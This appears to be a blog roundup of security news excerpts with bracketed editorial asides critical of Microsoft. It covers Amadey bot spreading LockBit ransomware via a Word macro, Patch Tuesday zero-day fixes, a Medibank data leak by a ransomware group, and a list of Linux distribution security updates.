Security Leftovers
-
Amadey Bot Spotted Deploying LockBit 3.0 Ransomware on Hacked Machines [Ed: Microsoft Windows TCO]
The cybersecurity firm's latest analysis is based on a Microsoft Word file ("심시아.docx") that was uploaded to VirusTotal on October 28, 2022. The document contains a malicious VBA macro that, when enabled by the victim, runs a PowerShell command to download and run Amadey.
-
Microsoft fixes four zero-days, 58 other flaws on Patch Tuesday [Ed: Microsoft already helped the NSA exploit these, and for who knows how long....]
Microsoft has released patches for four zero-day vulnerabilities among the 62 advisories which it released on Wednesday AEDT, in its monthly Patch Tuesday fixes. All of these zero-days have been exploited in the wild.
Nine of the flaws detailed were in the critical category, the security firm Tenable said in its analysis, with 53 being in the next, important, category.
Top of the list were two vulnerabilities that affect Windows Mark of the Web, a security feature used to tag files that are downloaded from the Internet, and prevent them from carrying out certain functions.
-
iTWire - Ransomware group keeps its word, posts Medibank data on dark web
A ransomware group that on Tuesday threatened to post data stolen from medical insurer Medibank Group on the dark web has kept its word and released a small sample of what it claims is the data it appropriated.
The operator of this group, that hosts a copy of the site formerly used by the REvil gang, said the data was stored "in not very understandable format (tables dumps) we'll take some time to sort it out and we posting (sic) a small part of the data, in 'human readable format (sample in json file )' also we post all raw data.
[...]
The name of the ransomware used is not definite but some refer to it as BlogXX. But it can attack only systems running Microsoft's Windows operating system.
-
Security updates for Tuesday [LWN.net]
Security updates have been issued by Debian (pixman and sudo), Fedora (mingw-binutils and mingw-gdb), Red Hat (bind, bind9.16, container-tools:3.0, container-tools:4.0, container-tools:rhel8, dnsmasq, dotnet7.0, dovecot, e2fsprogs, flatpak-builder, freetype, fribidi, gdisk, grafana, grafana-pcp, gstreamer1-plugins-good, httpd:2.4, kernel, kernel-rt, libldb, libreoffice, libtiff, libxml2, mingw-expat, mingw-zlib, mutt, nodejs:14, nodejs:18, openblas, openjpeg2, osbuild, pcs, php:7.4, php:8.0, pki-core:10.6 and pki-deps:10.6, poppler, protobuf, python27:2.7, python38:3.8 and python38-devel:3.8, python39:3.9 and python39-devel:3.9, qt5, redis:6, rsync, unbound, virt:rhel, virt-devel:rhel, wavpack, webkit2gtk3, xmlrpc-c, xorg-x11-server, xorg-x11-server-Xwayland, and yajl), SUSE (exiv2, expat, rubygem-nokogiri, sudo, and vsftpd), and Ubuntu (isc-dhcp, libraw, sqlite3, and tiff).